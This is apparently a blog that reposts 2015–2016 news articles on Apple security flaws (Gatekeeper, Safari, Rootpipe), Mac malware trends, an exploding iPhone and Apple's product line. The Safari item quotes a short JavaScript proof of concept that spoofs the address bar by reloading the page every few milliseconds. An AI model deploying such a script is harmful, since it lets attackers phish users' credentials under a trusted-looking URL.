Wednesday, January 20, 2016

Apple Gatekeeper still lets malware in

from komando.com
If you use a Mac, you may be comforted by its reputation for being secure. For decades, Apple had done a great job of keeper hackers out.

That is, until Apple products started becoming really popular in recent years. Then, hackers began to pounce. Now, Macs are often hit by hackers, or found to be vulnerable to attack.

That's the case with Apple Gatekeeper. Ironically, it's a program that's meant to keep the bad guys out. If you download apps, you can tell Apple to only let in apps from trusted providers.

As Apple puts it, Gatekeeper helps "protect your Mac from malware and misbehaving apps downloaded from the Internet." Apple says it screens all the apps on Mac App Store, and those created by developers with an Apple Developer ID.

Apple goes on to say: "If an app was developed by an unknown developer, one with no Developer ID, or tampered with, Gatekeeper can block the app from being installed." (See photo.)

The problem is cybersecurity experts last year found there's a flaw with Gatekeeper. The flaw, CVE-2015-7024, lets hackers get in. Once in, they can use malware to steal your personal information, take over your Mac and demand ransom, spy on you, and more.

Last year, this same cybersecurity expert alerted Apple about the flaw in Gatekeeper. Apple issued a patch to fix the problem.

However, as it turned out, Apple patched only some of the entryways for hackers to get in. The problem is, hackers can still get into Gatekeeper.

They can access a trusted app and load a .dmg file malware onto your Mac. It's vulnerable if you're not using the secure HTTPS protocol, or you're not accessing the app from the Mac App Store.

As of now, Apple is said to be working with cybersecurity experts to fully patch up the security flaw in Gatekeeper.

While Apple and cybersecurity experts work on fixing this vulnerability, you should make sure you're protecting yourself, your financial information, and your digital devices. You should use a suite of strong security tools, including an anti-virus program. We recommend our sponsor, Kaspersky Lab.

Thursday, December 31, 2015

Long Island Man Spends 10 Days in Hospital After iPhone Explodes in His Pocket

from patch.com "Best of 2015"
A Lindenhurst man recently spent more than a week in the hospital after his iPhone spontaneously exploded in his pocket.

Erik Johnson had reportedly just arrived at his cousin’s wake on Valentine’s Day when his iPhone 5c exploded as he bent down to pick up a set of keys he had dropped.

“I felt the burn instantly and a cloud of smoke instantly,” the 29-year-old told News 12 Long Island. “I couldn’t get the phone out of my pocket, so I had to rip my pants off to get the phone away from me.”

Johnson suffered a third-degree burn the size of a football to to his upper left thigh and spent 10 days in a hospital burn unit. He returned home on Tuesday.

The story was first reported by ABC 7. Johnson told the TV station that he heard a pop and then saw smoke coming from his pocket when he reached down to pick up the keys.

Johnson says his leg caught fire and the intensity of the heat melted his pocket shut.

“A couple of people actually said they could smell my body burning,” Johnson told ABC 7.

Apple says it is investigating the incident. Johnson is planning legal action against the electronics giant.

“Even if this only happened this one time, that’s one time too many,” Johnson’s lawyer, Mike Della, said according to the Daily News. “What if this happened to a child?”

There have been other recent reports of exploding iPhones. In October, an Arizona man claimed his iPhone 6 burst into flames in his pocket following a minor rickshaw accident. Last February, a middle school student in Maine suffered minor injuries after her iPhone 5c exploded in her pocket.

Monday, December 14, 2015

Cybercriminals will target Apple in 2016, say experts

from bbc.com
Cybercriminals are increasingly targeting Apple devices and 2016 will see a rise in attacks on its operating systems, security experts suggest.
According to security firm Symantec, the amount of malware aimed at Apple's mobile operating system (iOS) has more than doubled this year, while threats to Mac computers also rose.
Security firm FireEye also expects 2016 to be a bumper year for Apple malware.
Systems such as Apple Pay could be targeted, it predicts.
Apple is an obvious target for cybercriminals because its products are so popular, said Dick O'Brien, a researcher at Symantec.
While the total number of threats targeting Apple devices remains low compared with Windows and Android, Symantec is seeing the range of threats multiply.
Last year, it was seeing a monthly average of between 10,000 and 70,000 Mac computers infected with malware.
"This is far fewer than Windows desktops and we don't want to scaremonger. Apple remains a relatively safe platform but Apple users can no longer be complacent about security, as the number of infections and new threats rise," said Mr O'Brien.
The number of unique OS X computers infected with malware in the first nine months of 2015 was seven times higher than in all of 2014, its research found.
A significant amount of this spike is accounted for by so-called greyware - applications that may not have malware attached but can still be annoying to users, by serving up unwanted ads or tracking their web-browsing habits.
Symantec also found seven new threats aimed at Apple's mobile iOS platform, with jailbroken devices - those that have been unlocked - being particularly vulnerable.
And hackers are also increasingly targeting corporations, where Mac use is now more prevalent.
A corporate espionage group known as Butterfly which attacked multi-billion dollar companies in 2015 developed malware tools that attacked both Windows and Apple computers.
Walled garden
Traditionally iOS has been seen as a more secure platform than Android because of the more closed community that Apple runs for its apps but that is changing, according to FireEye.
While it found that the vast majority - 96% - of mobile malware is targeted at Android devices, iOS is no longer immune.
According to Bryce Boland, chief technology officer at FireEye, attackers are increasingly "finding ways into Apple's walled garden, and that will ramp up next year".
FireEye recently discovered that XcodeGhost, iOS malware that Apple acted quickly to remove from its app store, had found its way into the networks of 210 US businesses.
The attack was thought to be the first large-scale attack on Apple's app store.
The introduction of new payment systems, such as Apple Pay, will add a financial incentive for hackers, making it worth their "time and effort" to develop new malware, FireEye said.
Mr O'Brien said: "We haven't yet seen any threats targeting Apple Pay but anything that involves a financial transaction will be of interest to hackers."

Thursday, November 5, 2015

Mac OS X Malware Soars in 2015

from infosecurity-magazine.com/
Mac malware is set to accelerate over the coming months after having its most prolific year ever so far in 2015, according to new research from endpoint security firm Bit9 + Carbon Black.
After an analysis of the year so far, the vendor concluded that five times more Mac malware appeared in 2015 than the previous five years combined.   
It collected 1,400 unique samples over the period using custom built sandboxes and tools such as such as fs_usage, dtrace, and opensnoop.
It found that Mac malware as a whole does not borrow very heavily from Unix or Linux malware, which was unexpected given OS X’s roots in the open source FreeBSD.
Another interesting find was that more than 90% of the Mac malware it discovered still uses the old load command (LC_THREAD and LC_UNIXTHREAD) to define the entry point into the Mach-O format.
This makes it easier to spot potential malware—if a new system is still using the old command.
In addition, the Bit9 + Carbon Black researchers concluded that the vast majority of Mac malware uses one of just seven persistence techniques to remain on an infected system.
These include LaunchAgents; LaunchDaemons; Login items; Browser plugins; StartupItems; Binary infection; and Cron job.
It appears the growing prevalence of Mac malware is unsurprisingly linked to a rising market share among consumers and enterprises.
“For years, Mac users have watched their PC-using counterparts struggle with cyber-attacks, while enjoying the relative immunity that their hardware provides from malware. This view is becoming increasingly outdated; our research shows that Mac users should be just as worried,” argued Bit9 + Carbon Black Emea MD, David Flower.
“With 45 per cent of businesses now offering Macs as an option to staff, our research should be seen as a timely reminder that every device on the network is a potential target—businesses can’t just rely on a clearly outdated perception of invulnerability.”

Thursday, September 10, 2015

Apple's Core Problem Is That It Can No Longer Innovate

from forbes.com
Oh, how we laughed when Microsoft unveiled a tablet device with an expensive snap-on keyboard. And, when Steve Jobs declared that the stylus was complete folly and a thing of the past in 2007, we cheered. The tech industry has a very short memory it seems.

Roll forward to 2015 and Tim Cook showed an expectant audience much of the same that we’ve seen before, and like previous years we have grown to accept that the polish and style of delivery masks a growing problem at Cupertino: Apple has run out of juice.



iPhone 6S and 6S Plus

There was nothing here we didn’t already know or even expect, given the many leaks beforehand. Another mid-life iPhone facelift ahead of next year’s iPhone 7, with camera and processor spec bumps. The new iPhone was the last to be announced at the Apple Event because there was nothing to announce. The only attraction this time was Force Touch, something which will definitely kill off the Home Button on the next iteration when Apple figures out how to do fingerprint recognition from the screen for Apple Pay and Touch ID. Tim Cook struggled to make the ubiquitous device seem anything but more of the same. Live Photos? Sounds like a cross between Vine and what Google Photos has been doing for a while now. The 6S Plus is more of a curious beast though, because it almost heralds the death of the iPad Mini. but Apple won’t admit this yet.

iPad Mini 4

Here’s a device which received some treatment before it disappears from the iPad family-photo album entirely. Apple knows exactly how to capitalize on the runt of the litter, and a little extra gloss will definitely sell a few more numbers but with a 6S Plus in the Apple Store there is no real reason to own an Mini anymore. And it gets worse now Big Brother has arrived.

iPad Pro

This is where things get interesting. Apple unveiled a device clearly aimed at the more business and prosumer market. With a price point at the higher end to make laptop buyers weep, coupled with an expensive $169 snap-on keyboard and a ludicrous $99 Apple Pencil (i.e. a stylus) it was the clearest indication that Cupertino couldn’t innovate but only imitate competitor strategy. This was almost an admission that Microsoft got it right with the Surface, but just couldn’t market it like Apple hardware. The Pro is aimed at the enterprise market, a smart move by Apple (which has cut deals with IBM and Cisco for distribution of hardware and apps) in a time of slowing consumer tablet sales. But what could the Pro do the consumer laptop sales at Apple? Much like the 6S Plus will eat away at the iPad Mini, the iPad Pro will cut into sales of the Macbook Air. The Pro’s speed and screen resolution (it beats a Retina display on a MacBook Pro) will make many think twice about getting an Air, which until now has been Apple’s least expensive way to balance portability and performance.

Apple TV

The bedroom hobby project has been trying to become a serious hobby for years. It has still failed to be anything else, and yesterday’s announcement seemed very odd indeed. Apps are not the future of TV, in fact making consumers sit and watch more TV is not the future of the human race. And certainly owning a separate box to appify television is not the answer. Apple wants us to believe that their black beauty is what we need to make the living room come alive again, but every last-gen and current console has been doing what an Apple TV can do for a few years now, and more. If Apple really wanted to make this a serious concern, it would have baked tvOS into a television unit itself, or licensed it to one major OEM. But it won’t. Given that smart TVs already have apps that cater for the same content as Apple TV, together with consoles, Chromecast, Amazon FireStick, and voice interaction already exists, there is no killer reason to own an Apple TV on top. And as a casual games proposition? Please. Even the wording on the website makes it sound like Apple has singlehandedly reinvented the games industry.

Wednesday, May 20, 2015

Vulnerability in Safari Allows Attackers to Spoof Websites

from tripwire.com
A security firm has discovered a vulnerability in Apple’s Safari Browser that allows attackers to spoof legitimate websites and phish for user credentials.

Security firm Deusen reveals that the flaw works by using a short script to force Safari into loading one page while still displaying the URL of another page. This script is provided below:

<script>
function f()
{
location=”dailymail.co.uk/home/index.htm…”+Math.random();
}
setInterval(“f()”,10);
</script>

Deusen has published a demonstration of the vulnerability here.

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the ‘real’ web address instead of the fake one,” comments Manuel Humberto Santander Peláez, Handler at SANS Internet Storm Center.
The bug works on fully patched versions of iOS and OSX. Even so, the demo code is not perfect.

safariStaff members at Ars Technica tested the vulnerability, and while the demo code worked flawlessly with a MacBook Pro, the address bar on an iPad Mini periodically refreshed as the page appeared to reload.

Similarly, Help Net Security experienced some problems when testing the bug. The demo code appeared to work only until a user switched tabs, and even then, it reasoned that savvy users would notice a flickering in the loading progress bar of the address bar.

Despite the demo code’s flaws, less experienced users might not notice this behavior. Attackers could subsequently target unaware users by redirecting them to a malicious website where they could attempt to infect visitors with malware or steal their login credentials.

This vulnerability was discovered by the same group of researchers who discovered a Universal Cross Site Scripting (XSS) vulnerability in the latest versions of Microsoft’s Internet Explorer back in February of this year. That flaw also put web users’ login credentials and sensitive information at risk.

Users are encouraged to watch out for spoofing attacks that redirect them to phishing schemes.

Wednesday, April 22, 2015

Apple 'Rootpipe' security vulnerability still prevalent following patch

from techspot.com
Apple issued an OS X Yosemite update earlier this month which remedied a flaw known as Rootpipe. First discovered last October by security researcher Emil Kvarnhammar (yet having existed since at least 2011), the flaw allows bad actors to gain root access to a system through a backdoor in the system preferences app.
A second security researcher, Patrick Wardle, attempted to exploit the vulnerability on a patched machine and was apparently able to pull it off.
In a post on Objective-See, Wardle said he was on a return flight from a conference when he stumbled upon what he describes as a novel, yet trivial way for any local user to re-abuse Rootpipe. Wardle didn’t provide the technical details of the attack in the spirit of responsible disclosure (except to Apple, of course) but wanted other OS X users to be aware of the risk.
In an e-mailed statement to Forbes, Wardle said he was tempted to walk into an Apple store and try the exploit on a display model but stuck to testing it on his personal laptop.
Wardle, currently the director of research and development at security firm Synack, has made a name for himself in the security community by presenting at conferences including DefCon, VirusBulletin, ShmooCon and CanSecW.
Apple could have its hands full with Rootpipe. Another security researcher, Pedro Vilaça, told the publication that the original fix was doomed since its release because there are so many ways to bypass it “due to the wrong fix design.”
Apple has also been criticized for only issuing a patch for OS X Yosemite, effectively leaving a large number of Mac users vulnerable.